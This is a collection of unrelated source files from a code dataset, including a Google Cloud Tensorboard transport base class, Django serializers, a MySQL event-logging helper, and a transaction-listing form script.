License.\n#\nimport abc\nfrom typing import Awaitable, Callable, Dict, Optional, Sequence, Union\n\nfrom google.cloud.aiplatform_v1 import gapic_version as package_version\n\nimport google.auth # type: ignore\nimport google.api_core\nfrom google.api_core import exceptions as core_exceptions\nfrom google.api_core import gapic_v1\nfrom google.api_core import retry as retries\nfrom google.api_core import operations_v1\nfrom google.auth import credentials as ga_credentials # type: ignore\nfrom google.oauth2 import service_account # type: ignore\n\nfrom google.cloud.aiplatform_v1.types import tensorboard\nfrom google.cloud.aiplatform_v1.types import tensorboard_experiment\nfrom google.cloud.aiplatform_v1.types import (\n tensorboard_experiment as gca_tensorboard_experiment,\n)\nfrom google.cloud.aiplatform_v1.types import tensorboard_run\nfrom google.cloud.aiplatform_v1.types import tensorboard_run as gca_tensorboard_run\nfrom google.cloud.aiplatform_v1.types import tensorboard_service\nfrom google.cloud.aiplatform_v1.types import tensorboard_time_series\nfrom google.cloud.aiplatform_v1.types import (\n tensorboard_time_series as gca_tensorboard_time_series,\n)\nfrom google.cloud.location import locations_pb2 # type: ignore\nfrom google.iam.v1 import iam_policy_pb2 # type: ignore\nfrom google.iam.v1 import policy_pb2 # type: ignore\nfrom google.longrunning import operations_pb2\nfrom google.longrunning import operations_pb2 # type: ignore\n\nDEFAULT_CLIENT_INFO = gapic_v1.client_info.ClientInfo(\n gapic_version=package_version.__version__\n)\n\n\nclass TensorboardServiceTransport(abc.ABC):\n \"\"\"Abstract transport class for TensorboardService.\"\"\"\n\n AUTH_SCOPES = (\n \"https://www.googleapis.com/auth/cloud-platform\",\n \"https://www.googleapis.com/auth/cloud-platform.read-only\",\n )\n\n DEFAULT_HOST: str = \"aiplatform.googleapis.com\"\n\n def __init__(\n self,\n *,\n host: str = DEFAULT_HOST,\n credentials: Optional[ga_credentials.Credentials] = None,\n credentials_file: Optional[str] = None,\n scopes: Optional[Sequence[str]] = None,\n quota_project_id: Optional[str] = None,\n client_info: gapic_v1.client_info.ClientInfo = DEFAULT_CLIENT_INFO,\n always_use_jwt_access: Optional[bool] = False,\n api_audience: Optional[str] = None,\n **kwargs,\n ) -> None:\n \"\"\"Instantiate the transport.\n\n Args:\n host (Optional[str]):\n The hostname to connect to.\n credentials (Optional[google.auth.credentials.Credentials]): The\n authorization credentials to attach to requests. These\n credentials identify the application to the service; if none\n are specified, the client will attempt to ascertain the\n credentials from the environment.\n credentials_file (Optional[str]): A file with credentials that can\n be loaded with :func:`google.auth.load_credentials_from_file`.\n This argument is mutually exclusive with credentials.\n scopes (Optional[Sequence[str]]): A list of scopes.\n quota_project_id (Optional[str]): An optional project to use for billing\n and quota.\n client_info (google.api_core.gapic_v1.client_info.ClientInfo):\n The client info used to send a user-agent string along with\n API requests. If ``None``, then default info will be used.\n Generally, you only need to set this if you're developing\n your own client library.\n always_use_jwt_access (Optional[bool]): Whether self signed JWT should\n be used for service account credentials.\n \"\"\"\n\n scopes_kwargs = {\"scopes\": scopes, \"default_scopes\": self.AUTH_SCOPES}\n\n # Save the scopes.\n self._scopes = scopes\n\n # If no credentials are provided, then determine the appropriate\n # defaults.\n if credentials and credentials_file:\n raise core_exceptions.DuplicateCredentialArgs(\n \"'credentials_file' and 'credentials' are mutually exclusive\"\n )\n\n if credentials_file is not None:\n credentials, _ = google.auth.load_credentials_from_file(\n credentials_file, **scopes_kwargs, quota_project_id=quota_project_id\n )\n elif credentials is None:\n credentials, _ = google.auth.default(\n **scopes_kwargs, quota_project_id=quota_project_id\n )\n # Don't apply audience if the credentials file passed from user.\n if hasattr(credentials, \"with_gdch_audience\"):\n credentials = credentials.with_gdch_audience(\n api_audience if api_audience else host\n )\n\n # If the credentials are service account credentials, then always try to use self signed JWT.\n if (\n always_use_jwt_access\n and isinstance(credentials, service_account.Credentials)\n and hasattr(service_account.Credentials, \"with_always_use_jwt_access\")\n ):\n credentials = credentials.with_always_use_jwt_access(True)\n\n # Save the credentials.\n self._credentials = credentials\n\n # Save the hostname. Default to port 443 (HTTPS) if none is specified.\n if \":\" not in host:\n host += \":443\"\n self._host = host\n\n def _prep_wrapped_messages(self, client_info):\n # Precompute the wrapped methods.\n self._wrapped_methods = {\n self.create_tensorboard: gapic_v1.method.wrap_method(\n self.create_tensorboard,\n default_timeout=None,\n client_info=client_info,\n ),\n self.get_tensorboard: gapic_v1.method.wrap_method(\n self.get_tensorboard,\n default_timeout=None,\n client_info=client_info,\n ),\n self.update_tensorboard: gapic_v1.method.wrap_method(\n self.update_tensorboard,\n default_timeout=None,\n client_info=client_info,\n ),\n self.list_tensorboards: gapic_v1.method.wrap_method(\n self.list_tensorboards,\n default_timeout=None,\n client_info=client_info,\n ),\n self.delete_tensorboard: gapic_v1.method.wrap_method(\n self.delete_tensorboard,\n default_timeout=None,\n client_info=client_info,\n ),\n self.read_tensorboard_usage: gapic_v1.method.wrap_method(\n self.read_tensorboard_usage,\n default_timeout=None,\n client_info=client_info,\n ),\n self.read_tensorboard_size: gapic_v1.method.wrap_method(\n self.read_tensorboard_size,\n default_timeout=None,\n client_info=client_info,\n ),\n self.create_tensorboard_experiment: gapic_v1.method.wrap_method(\n self.create_tensorboard_experiment,\n default_timeout=None,\n client_info=client_info,\n ),\n self.get_tensorboard_experiment: gapic_v1.method.wrap_method(\n self.get_tensorboard_experiment,\n default_timeout=None,\n client_info=client_info,\n ),\n self.update_tensorboard_experiment: gapic_v1.method.wrap_method(\n self.update_tensorboard_experiment,\n default_timeout=None,\n client_info=client_info,\n ),\n self.list_tensorboard_experiments: gapic_v1.method.wrap_method(\n self.list_tensorboard_experiments,\n default_timeout=None,\n client_info=client_info,\n ),\n self.delete_tensorboard_experiment: gapic_v1.method.wrap_method(\n self.delete_tensorboard_experiment,\n default_timeout=None,\n client_info=client_info,\n ),\n self.create_tensorboard_run: gapic_v1.method.wrap_method(\n self.create_tensorboard_run,\n default_timeout=None,\n client_info=client_info,\n ),\n self.batch_create_tensorboard_runs: gapic_v1.method.wrap_method(\n self.batch_create_tensorboard_runs,\n default_timeout=None,\n client_info=client_info,\n ),\n self.get_tensorboard_run: gapic_v1.method.wrap_method(\n self.get_tensorboard_run,\n default_timeout=None,\n client_info=client_info,\n ),\n self.update_tensorboard_run: gapic_v1.method.wrap_method(\n self.update_tensorboard_run,\n default_timeout=None,\n client_info=client_info,\n ),\n self.list_tensorboard_runs: gapic_v1.method.wrap_method(\n self.list_tensorboard_runs,\n default_timeout=None,\n client_info=client_info,\n ),\n self.delete_tensorboard_run: gapic_v1.method.wrap_method(\n self.delete_tensorboard_run,\n default_timeout=None,\n client_info=client_info,\n ),\n self.batch_create_tensorboard_time_series: gapic_v1.method.wrap_method(\n self.batch_create_tensorboard_time_series,\n default_timeout=None,\n client_info=client_info,\n ),\n self.create_tensorboard_time_series: gapic_v1.method.wrap_method(\n self.create_tensorboard_time_series,\n default_timeout=None,\n client_info=client_info,\n ),\n self.get_tensorboard_time_series: gapic_v1.method.wrap_method(\n self.get_tensorboard_time_series,\n default_timeout=None,\n client_info=client_info,\n ),\n self.update_tensorboard_time_series: gapic_v1.method.wrap_method(\n self.update_tensorboard_time_series,\n default_timeout=None,\n client_info=client_info,\n ),\n self.list_tensorboard_time_series: gapic_v1.method.wrap_method(\n self.list_tensorboard_time_series,\n default_timeout=None,\n client_info=client_info,\n ),\n self.delete_tensorboard_time_series: gapic_v1.method.wrap_method(\n self.delete_tensorboard_time_series,\n default_timeout=None,\n client_info=client_info,\n ),\n self.batch_read_tensorboard_time_series_data: gapic_v1.method.wrap_method(\n self.batch_read_tensorboard_time_series_data,\n default_timeout=None,\n client_info=client_info,\n ),\n self.read_tensorboard_time_series_data: gapic_v1.method.wrap_method(\n self.read_tensorboard_time_series_data,\n default_timeout=None,\n client_info=client_info,\n ),\n self.read_tensorboard_blob_data: gapic_v1.method.wrap_method(\n self.read_tensorboard_blob_data,\n default_timeout=None,\n client_info=client_info,\n ),\n self.write_tensorboard_experiment_data: gapic_v1.method.wrap_method(\n self.write_tensorboard_experiment_data,\n default_timeout=None,\n client_info=client_info,\n ),\n self.write_tensorboard_run_data: gapic_v1.method.wrap_method(\n self.write_tensorboard_run_data,\n default_timeout=None,\n client_info=client_info,\n ),\n self.export_tensorboard_time_series_data: gapic_v1.method.wrap_method(\n self.export_tensorboard_time_series_data,\n default_timeout=None,\n client_info=client_info,\n ),\n }\n\n def close(self):\n \"\"\"Closes resources associated with the transport.\n\n .. warning::\n Only call this method if the transport is NOT shared\n with other clients - this may cause errors in other clients!\n \"\"\"\n raise NotImplementedError()\n\n @property\n def operations_client(self):\n \"\"\"Return the client designed to process long-running operations.\"\"\"\n raise NotImplementedError()\n\n @property\n def create_tensorboard(\n self,\n ) -> Callable[\n [tensorboard_service.CreateTensorboardRequest],\n Union[operations_pb2.Operation, Awaitable[operations_pb2.Operation]],\n ]:\n raise NotImplementedError()\n\n @property\n def get_tensorboard(\n self,\n ) -> Callable[\n [tensorboard_service.GetTensorboardRequest],\n Union[tensorboard.Tensorboard, Awaitable[tensorboard.Tensorboard]],\n ]:\n raise NotImplementedError()\n\n @property\n def update_tensorboard(\n self,\n ) -> Callable[\n [tensorboard_service.UpdateTensorboardRequest],\n Union[operations_pb2.Operation, Awaitable[operations_pb2.Operation]],\n ]:\n raise NotImplementedError()\n\n @property\n def list_tensorboards(\n self,\n ) -> Callable[\n [tensorboard_service.ListTensorboardsRequest],\n Union[\n tensorboard_service.ListTensorboardsResponse,\n Awaitable[tensorboard_service.ListTensorboardsResponse],\n ],\n ]:\n raise NotImplementedError()\n\n @property\n def delete_tensorboard(\n self,\n ) -> Callable[\n [tensorboard_service.DeleteTensorboardRequest],\n Union[operations_pb2.Operation, Awaitable[operations_pb2.Operation]],\n ]:\n raise NotImplementedError()\n\n @property\n def read_tensorboard_usage(\n self,\n ) -> Callable[\n [tensorboard_service.ReadTensorboardUsageRequest],\n Union[\n tensorboard_service.ReadTensorboardUsageResponse,\n Awaitable[tensorboard_service.ReadTensorboardUsageResponse],\n ],\n ]:\n raise NotImplementedError()\n\n @property\n def read_tensorboard_size(\n self,\n ) -> Callable[\n [tensorboard_service.ReadTensorboardSizeRequest],\n Union[\n tensorboard_service.ReadTensorboardSizeResponse,\n Awaitable[tensorboard_service.ReadTensorboardSizeResponse],\n ],\n ]:\n raise NotImplementedError()\n\n @property\n def create_tensorboard_experiment(\n self,\n ) -> Callable[\n [tensorboard_service.CreateTensorboardExperimentRequest],\n Union[\n gca_tensorboard_experiment.TensorboardExperiment,\n Awaitable[gca_tensorboard_experiment.TensorboardExperiment],\n ],\n ]:\n raise NotImplementedError()\n\n @property\n def get_tensorboard_experiment(\n self,\n ) -> Callable[\n [tensorboard_service.GetTensorboardExperimentRequest],\n Union[\n tensorboard_experiment.TensorboardExperiment,\n Awaitable[tensorboard_experiment.TensorboardExperiment],\n ],\n ]:\n raise NotImplementedError()\n\n @property\n def update_tensorboard_experiment(\n self,\n ) -> Callable[\n [tensorboard_service.UpdateTensorboardExperimentRequest],\n Union[\n gca_tensorboard_experiment.TensorboardExperiment,\n Awaitable[gca_tensorboard_experiment.TensorboardExperiment],\n ],\n ]:\n raise NotImplementedError()\n\n @property\n def list_tensorboard_experiments(\n self,\n ) -> Callable[\n [tensorboard_service.ListTensorboardExperimentsRequest],\n Union[\n tensorboard_service.ListTensorboardExperimentsResponse,\n Awaitable[tensorboard_service.ListTensorboardExperimentsResponse],\n ],\n ]:\n raise NotImplementedError()\n\n @property\n def delete_tensorboard_experiment(\n self,\n ) -> Callable[\n [tensorboard_service.DeleteTensorboardExperimentRequest],\n Union[operations_pb2.Operation, Awaitable[operations_pb2.Operation]],\n ]:\n raise NotImplementedError()\n\n @property\n def create_tensorboard_run(\n self,\n ) -> Callable[\n [tensorboard_service.CreateTensorboardRunRequest],\n Union[\n gca_tensorboard_run.TensorboardRun,\n Awaitable[gca_tensorboard_run.TensorboardRun],\n ],\n ]:\n raise NotImplementedError()\n\n @property\n def batch_create_tensorboard_runs(\n self,\n ) -> Callable[\n [tensorboard_service.BatchCreateTensorboardRunsRequest],\n Union[\n tensorboard_service.BatchCreateTensorboardRunsResponse,\n Awaitable[tensorboard_service.BatchCreateTensorboardRunsResponse],\n ],\n ]:\n raise NotImplementedError()\n\n @property\n def get_tensorboard_run(\n self,\n ) -> Callable[\n [tensorboard_service.GetTensorboardRunRequest],\n Union[\n tensorboard_run.TensorboardRun, Awaitable[tensorboard_run.TensorboardRun]\n ],\n ]:\n raise NotImplementedError()\n\n @property\n def update_tensorboard_run(\n self,\n ) -> Callable[\n [tensorboard_service.UpdateTensorboardRunRequest],\n Union[\n gca_tensorboard_run.TensorboardRun,\n Awaitable[gca_tensorboard_run.TensorboardRun],\n ],\n ]:\n raise NotImplementedError()\n\n @property\n def list_tensorboard_runs(\n self,\n ) -> Callable[\n [tensorboard_service.ListTensorboardRunsRequest],\n Union[\n tensorboard_service.ListTensorboardRunsResponse,\n Awaitable[tensorboard_service.ListTensorboardRunsResponse],\n ],\n ]:\n raise NotImplementedError()\n\n @property\n def delete_tensorboard_run(\n self,\n ) -> Callable[\n [tensorboard_service.DeleteTensorboardRunRequest],\n Union[operations_pb2.Operation, Awaitable[operations_pb2.Operation]],\n ]:\n raise NotImplementedError()\n\n @property\n def batch_create_tensorboard_time_series(\n self,\n ) -> Callable[\n [tensorboard_service.BatchCreateTensorboardTimeSeriesRequest],\n Union[\n tensorboard_service.BatchCreateTensorboardTimeSeriesResponse,\n Awaitable[tensorboard_service.BatchCreateTensorboardTimeSeriesResponse],\n ],\n ]:\n raise NotImplementedError()\n\n @property\n def create_tensorboard_time_series(\n self,\n ) -> Callable[\n [tensorboard_service.CreateTensorboardTimeSeriesRequest],\n Union[\n gca_tensorboard_time_series.TensorboardTimeSeries,\n Awaitable[gca_tensorboard_time_series.TensorboardTimeSeries],\n ],\n ]:\n raise NotImplementedError()\n\n @property\n def get_tensorboard_time_series(\n self,\n ) -> Callable[\n [tensorboard_service.GetTensorboardTimeSeriesRequest],\n Union[\n tensorboard_time_series.TensorboardTimeSeries,\n Awaitable[tensorboard_time_series.TensorboardTimeSeries],\n ],\n ]:\n raise NotImplementedError()\n\n @property\n def update_tensorboard_time_series(\n self,\n ) -> Callable[\n [tensorboard_service.UpdateTensorboardTimeSeriesRequest],\n Union[\n gca_tensorboard_time_series.TensorboardTimeSeries,\n Awaitable[gca_tensorboard_time_series.TensorboardTimeSeries],\n ],\n ]:\n raise NotImplementedError()\n\n @property\n def list_tensorboard_time_series(\n self,\n ) -> Callable[\n [tensorboard_service.ListTensorboardTimeSeriesRequest],\n Union[\n tensorboard_service.ListTensorboardTimeSeriesResponse,\n Awaitable[tensorboard_service.ListTensorboardTimeSeriesResponse],\n ],\n ]:\n raise NotImplementedError()\n\n @property\n def delete_tensorboard_time_series(\n self,\n ) -> Callable[\n [tensorboard_service.DeleteTensorboardTimeSeriesRequest],\n Union[operations_pb2.Operation, Awaitable[operations_pb2.Operation]],\n ]:\n raise NotImplementedError()\n\n @property\n def batch_read_tensorboard_time_series_data(\n self,\n ) -> Callable[\n [tensorboard_service.BatchReadTensorboardTimeSeriesDataRequest],\n Union[\n tensorboard_service.BatchReadTensorboardTimeSeriesDataResponse,\n Awaitable[tensorboard_service.BatchReadTensorboardTimeSeriesDataResponse],\n ],\n ]:\n raise NotImplementedError()\n\n @property\n def read_tensorboard_time_series_data(\n self,\n ) -> Callable[\n [tensorboard_service.ReadTensorboardTimeSeriesDataRequest],\n Union[\n tensorboard_service.ReadTensorboardTimeSeriesDataResponse,\n Awaitable[tensorboard_service.ReadTensorboardTimeSeriesDataResponse],\n ],\n ]:\n raise NotImplementedError()\n\n @property\n def read_tensorboard_blob_data(\n self,\n ) -> Callable[\n [tensorboard_service.ReadTensorboardBlobDataRequest],\n Union[\n tensorboard_service.ReadTensorboardBlobDataResponse,\n Awaitable[tensorboard_service.ReadTensorboardBlobDataResponse],\n ],\n ]:\n raise NotImplementedError()\n\n @property\n def write_tensorboard_experiment_data(\n self,\n ) -> Callable[\n [tensorboard_service.WriteTensorboardExperimentDataRequest],\n Union[\n tensorboard_service.WriteTensorboardExperimentDataResponse,\n Awaitable[tensorboard_service.WriteTensorboardExperimentDataResponse],\n ],\n ]:\n raise NotImplementedError()\n\n @property\n def write_tensorboard_run_data(\n self,\n ) -> Callable[\n [tensorboard_service.WriteTensorboardRunDataRequest],\n Union[\n tensorboard_service.WriteTensorboardRunDataResponse,\n Awaitable[tensorboard_service.WriteTensorboardRunDataResponse],\n ],\n ]:\n raise NotImplementedError()\n\n @property\n def export_tensorboard_time_series_data(\n self,\n ) -> Callable[\n [tensorboard_service.ExportTensorboardTimeSeriesDataRequest],\n Union[\n tensorboard_service.ExportTensorboardTimeSeriesDataResponse,\n Awaitable[tensorboard_service.ExportTensorboardTimeSeriesDataResponse],\n ],\n ]:\n raise NotImplementedError()\n\n @property\n def list_operations(\n self,\n ) -> Callable[\n [operations_pb2.ListOperationsRequest],\n Union[\n operations_pb2.ListOperationsResponse,\n Awaitable[operations_pb2.ListOperationsResponse],\n ],\n ]:\n raise NotImplementedError()\n\n @property\n def get_operation(\n self,\n ) -> Callable[\n [operations_pb2.GetOperationRequest],\n Union[operations_pb2.Operation, Awaitable[operations_pb2.Operation]],\n ]:\n raise NotImplementedError()\n\n @property\n def cancel_operation(\n self,\n ) -> Callable[[operations_pb2.CancelOperationRequest], None,]:\n raise NotImplementedError()\n\n @property\n def delete_operation(\n self,\n ) -> Callable[[operations_pb2.DeleteOperationRequest], None,]:\n raise NotImplementedError()\n\n @property\n def wait_operation(\n self,\n ) -> Callable[\n [operations_pb2.WaitOperationRequest],\n Union[operations_pb2.Operation, Awaitable[operations_pb2.Operation]],\n ]:\n raise NotImplementedError()\n\n @property\n def set_iam_policy(\n self,\n ) -> Callable[\n [iam_policy_pb2.SetIamPolicyRequest],\n Union[policy_pb2.Policy, Awaitable[policy_pb2.Policy]],\n ]:\n raise NotImplementedError()\n\n @property\n def get_iam_policy(\n self,\n ) -> Callable[\n [iam_policy_pb2.GetIamPolicyRequest],\n Union[policy_pb2.Policy, Awaitable[policy_pb2.Policy]],\n ]:\n raise NotImplementedError()\n\n @property\n def test_iam_permissions(\n self,\n ) -> Callable[\n [iam_policy_pb2.TestIamPermissionsRequest],\n Union[\n iam_policy_pb2.TestIamPermissionsResponse,\n Awaitable[iam_policy_pb2.TestIamPermissionsResponse],\n ],\n ]:\n raise NotImplementedError()\n\n @property\n def get_location(\n self,\n ) -> Callable[\n [locations_pb2.GetLocationRequest],\n Union[locations_pb2.Location, Awaitable[locations_pb2.Location]],\n ]:\n raise NotImplementedError()\n\n @property\n def list_locations(\n self,\n ) -> Callable[\n [locations_pb2.ListLocationsRequest],\n Union[\n locations_pb2.ListLocationsResponse,\n Awaitable[locations_pb2.ListLocationsResponse],\n ],\n ]:\n raise NotImplementedError()\n\n @property\n def kind(self) -> str:\n raise NotImplementedError()\n\n\n__all__ = (\"TensorboardServiceTransport\",)\n","sub_path":"google/cloud/aiplatform_v1/services/tensorboard_service/transports/base.py","file_name":"base.py","file_ext":"py","file_size_in_byte":25585,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"520323643","text":"import os, sys, glob, traceback\n\nimport parse_one\n\nfrom tools.common import open_json\n\nverbose = \"--quiet\" not in sys.argv\n\nAPI_DIRECTORY = sys.argv[1]\n\nalready_done = {}\nfor jsondos in glob.glob(os.path.join(API_DIRECTORY, '*/viz/procedure.json')):\n dos = open_json(jsondos)\n if dos.get('url_jo'):\n already_done[dos.get('url_dossier_senat')] = True\n\nfor url in sys.stdin:\n url = url.strip()\n if url in already_done:\n if verbose:\n print()\n print('======')\n print(url)\n print(' + passed, already done:', url)\n continue\n try:\n parse_one.process(API_DIRECTORY, url)\n except KeyboardInterrupt:\n break\n except Exception as e:\n traceback.print_exc()\n","sub_path":"parse_many.py","file_name":"parse_many.py","file_ext":"py","file_size_in_byte":752,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"241326462","text":"import speech\nimport MySQLdb\nimport detector\ndef retname(name):\n\ttry:\n\t\treturn{'your':'my','you':'my','yours':'mine'}[name]\n\texcept:\n\t\tif name==\"my\":\n\t\t\tlst=detector.detectothers()\n\t\t\tprint(lst)\n\t\t\tif len(lst)>1:\n\t\t\t\tspeech.say(\"many people are there\")\n\t\t\t\tspeech.say(\"Whose is it?\")\n\t\t\t\tname=speech.input(\"\")\n\t\t\telse:\n\t\t\t\tname=lst[0]\n\t\t\treturn name\n\t\telse:\n\t\t\treturn name\ndef addevent(year,month,day,event_type,name):\n\tdb = MySQLdb.connect(host=\"localhost\",\n\t\t\t\t\t\tuser=\"root\",\n\t\t\t\t\t\tpasswd=\"6461\",\n\t\t\t\t\t\tdb=\"mine\")\n\tcur = db.cursor()\n\tname=retname(name)\n\tprint(year,month,day)\n\tcur.execute(\"INSERT INTO `event_manager`(`year`, `month`, `day`, `event_type`, `name`) VALUES (%d,%d,%d,'%s','%s')\"%(int(year),int(month),int(day),event_type,name))\n\tdb.close()\n\tspeech.say(\"Alright. Noted.\")","sub_path":"eventadd.py","file_name":"eventadd.py","file_ext":"py","file_size_in_byte":786,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"217350023","text":"def for_two():\r\n for row in range(5):\r\n for col in range(4):\r\n if (row==4 or row+col==4) or (row==0 and col!=0) or (row==1 and col<1):\r\n print(\"*\",end=\" \")\r\n else:\r\n print(end=\" \")\r\n print()\r\n\r\ndef while_two():\r\n row=0\r\n while row<5:\r\n col=0\r\n while col<4:\r\n if (row==4 or row+col==4) or (row==0 and col!=0) or (row==1 and col<1):\r\n print(\"*\",end=\" \")\r\n else:\r\n print(end=\" \")\r\n col+=1\r\n row+=1\r\n print()\r\n","sub_path":"Num/two.py","file_name":"two.py","file_ext":"py","file_size_in_byte":576,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"468241328","text":"from rest_framework.serializers import (\n HyperlinkedIdentityField,\n ModelSerializer,\n SerializerMethodField,\n HyperlinkedRelatedField,\n )\nfrom elements.models import Element\nfrom groups.models import ALLOWED_EXTENSIONS\nfrom django.core.exceptions import ValidationError\n\n\nelement_detail_url = HyperlinkedIdentityField(\n view_name='element-detail',\n )\n\n\nclass ElementListSerializer(ModelSerializer):\n url = element_detail_url\n class Meta:\n model = Element\n fields = [\n 'url',\n 'name',\n 'description',\n ]\n\n\nclass ElementDetailSerializer(ModelSerializer):\n url = element_detail_url\n parent_group = HyperlinkedRelatedField(view_name='group-detail', read_only=True)\n class Meta:\n model = Element\n fields = [\n 'url',\n 'icon',\n 'name',\n 'description',\n 'creation_date',\n 'moderated',\n 'parent_group',\n ]\n\n\nclass ElementCreateSerializer(ModelSerializer):\n class Meta:\n model = Element\n fields = [\n 'name',\n 'parent_group',\n 'description',\n 'creation_date',\n 'icon',\n 'height_field',\n 'width_field',\n ]\n \n def validate(self, attrs):\n extension = attrs['icon'].name.split('.')[1]\n if extension not in ALLOWED_EXTENSIONS:\n raise ValidationError('This extension is not allowed')\n return attrs\n","sub_path":"elements/api/serializer.py","file_name":"serializer.py","file_ext":"py","file_size_in_byte":1517,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"138980391","text":"\n\n# about HbA1c test: https://medlineplus.gov/lab-tests/hemoglobin-a1c-hba1c-test/\n\n# examples \ndata = [{'A1C_INDEX': 5.5,\n 'other_keys1': 1,\n 'other_keys2': 'other_values2',\n },\n {'A1C_INDEX': 6.0,\n 'other_keys1': 1,\n 'other_keys2': 'other_values2',\n },\n {'A1C_INDEX': 5.5,\n 'other_keys1': 1,\n 'other_keys2': 'other_values2',\n },\n {'A1C_INDEX_DOES_NOT_EXIST': 5.5,\n 'other_keys1': 1,\n 'other_keys2': 'other_values2',\n },\n {'A1C_INDEX': 7.5,\n 'other_keys1': 1,\n 'other_keys2': 'other_values2',\n },\n {'A1C_INDEX': 10.5,\n 'other_keys1': 1,\n 'other_keys2': 'other_values2',\n },\n ]\nnum_quarters = 8\nassert num_quarters >= len(data), 'Error: num_quarters must be greater or equal to length of \\'data\\' array'\n\nimport numpy as np\nA1C_INDEX = 'A1C_INDEX'\ndef target_a1c(data):\n out = np.zeros(num_quarters, dtype = int)\n for i, x in enumerate(data): # i is the index of list data, starting from 0 to len(data)-1, x is the element, dictionary datatype\n for k, v in x.items(): # traverse through dictionary 'x' since it's dictionary format\n if k == A1C_INDEX: # for simplicity, just set A1C_INDEX to 'A1C_INDEX'\n value = float(v) # just in case 'v' is string or other format\n if value <= 5.7:\n out[i] = 1\n elif value <= 6.4:\n out[i] = 2\n elif value <= 9:\n out[i] = 3\n else: # this is when 'value' > 9\n out[i] = 4\n return out.tolist()\n\nprint(f'out is: {target_a1c(data)}')\n# when num_quarters is greater than length of 'data' list, the default value is 0, in this case, it's the last two values in 'out'\n# out is: [1, 2, 1, 3, 4, 0, 0]","sub_path":"OutOfBag/uncleCarl.py","file_name":"uncleCarl.py","file_ext":"py","file_size_in_byte":1889,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"546160646","text":"import com.ihsan.timeutils as timeutils\r\nimport com.ihsan.foundation.pobjecthelper as phelper\r\n\r\ndef FormSetDataEx(uideflist,params):\r\n config = uideflist.Config\r\n helper = phelper.PObjectHelper(config)\r\n recParam = params.FirstRecord\r\n\r\n if params.DatasetCount == 0 : return\r\n \r\n key = 'PObj:DistributionTransferInfo#DistributionId=%d' % recParam.DistributionId\r\n uideflist.SetData('uipDistTransInfo',key)\r\n \r\n oDistTransferInfo = helper.GetObject('DistributionTransferInfo', recParam.DistributionId)\r\n uipTransferInfo = uideflist.uipDistTransInfo.Dataset.GetRecord(0)\r\n uipTransferInfo.UsedAmount = (uipTransferInfo.DistributionAmount or 0.0) - (uipTransferInfo.Balance or 0.0)\r\n uipTransferInfo.TransactionDate = oDistTransferInfo.LTransaction.GetAsTDateTime('ActualDate')\r\n uipTransferInfo.TransactionNo = oDistTransferInfo.LTransaction.TransactionNo\r\n \r\n FillCATransaction(uideflist, helper, recParam.DistributionId)\r\n FillCARTransaction(uideflist, helper, recParam.DistributionId)\r\n \r\ndef FillCATransaction(uideflist, helper, DistributionId):\r\n config = helper.Config\r\n\r\n sOQL = \"\"\"\r\n select from CATransactItem\r\n [ distributiontransferid = :transferid ]\r\n ( LTransaction.TransactionNo\r\n , LTransaction.TransactionDate\r\n , LTransaction.ActualDate\r\n , LTransaction.Description\r\n , LTransaction.Inputer\r\n , LTransaction.TransactionId\r\n , Amount\r\n , self\r\n ) then order by TransactionNo, ActualDate;\r\n \"\"\"\r\n\r\n resOQL = config.OQLEngine.CreateOQL(sOQL)\r\n resOQL.SetParameterValueByName('transferid', DistributionId)\r\n\r\n resOQL.ApplyParamValues()\r\n\r\n resOQL.active = 1\r\n ds = resOQL.rawresult\r\n ds.First()\r\n\r\n while not ds.Eof:\r\n recCATrans = uideflist.uipListCATrans.Dataset.AddRecord()\r\n recCATrans.InputDate = timeutils.AsTDateTime(config, ds.TransactionDate)\r\n recCATrans.ActualDate = timeutils.AsTDateTime(config, ds.ActualDate)\r\n recCATrans.TransactionNo = ds.TransactionNo\r\n recCATrans.Amount = ds.Amount\r\n recCATrans.Description = ds.Description\r\n recCATrans.UserInput = ds.Inputer\r\n \r\n oCAReturnInfo = helper.GetObjectByNames('CashAdvanceReturnInfo',\r\n {'SourceTransactionId' : ds.TransactionId}\r\n )\r\n\r\n if oCAReturnInfo.isnull :\r\n recCATrans.ReturnStatus = 'F'\r\n else :\r\n recCATrans.ReturnStatus = 'T'\r\n \r\n ds.Next()\r\n \r\n \r\ndef FillCARTransaction(uideflist, helper, DistributionId):\r\n config = helper.Config\r\n\r\n sSQL = \"\"\"\r\n select t1.* , i.*, t2.TransactionNo\r\n from transaction.transaction t1\r\n , transaction.CashAdvanceReturnInfo i\r\n , transaction.transaction t2\r\n where\r\n t1.transactionid = i.returntransactionid\r\n and t2.transactionid = i.sourcetransactionid\r\n and exists(\r\n select 1\r\n from transaction.transactionitem ti\r\n , transaction.accounttransactionitem ac\r\n where ti.transactionitemid = ac.transactionitemid\r\n and ti.transactionid = i.sourcetransactionid\r\n and ac.distributiontransferid = %d\r\n )\r\n order by t2.TransactionNo, t1.actualdate\r\n \"\"\" % DistributionId\r\n\r\n ds = config.CreateSQL(sSQL).rawresult\r\n ds.First()\r\n\r\n while not ds.Eof:\r\n recCATrans = uideflist.uipListCARTrans.Dataset.AddRecord()\r\n recCATrans.InputDate = timeutils.AsTDateTime(config, ds.TransactionDate)\r\n recCATrans.ActualDate = timeutils.AsTDateTime(config, ds.ActualDate)\r\n recCATrans.TransactionNo = ds.TransactionNo\r\n recCATrans.SourceTransactionNo = ds.TransactionNo_1\r\n recCATrans.ReimburseAmount = ds.ReimburseAmount\r\n recCATrans.ReturnAmount = ds.ReturnAmount\r\n\r\n recCATrans.CAAmount = ds.Amount\r\n if ds.ReimburseAmount > 0.0 :\r\n recCATrans.Amount = ds.Amount + ds.ReimburseAmount\r\n elif ds.ReturnAmount > 0.0 :\r\n recCATrans.Amount = ds.Amount - ds.ReturnAmount\r\n else:\r\n recCATrans.Amount = ds.Amount\r\n \r\n recCATrans.Description = ds.Description\r\n recCATrans.UserInput = ds.Inputer\r\n\r\n\r\n\r\n \r\n\r\n 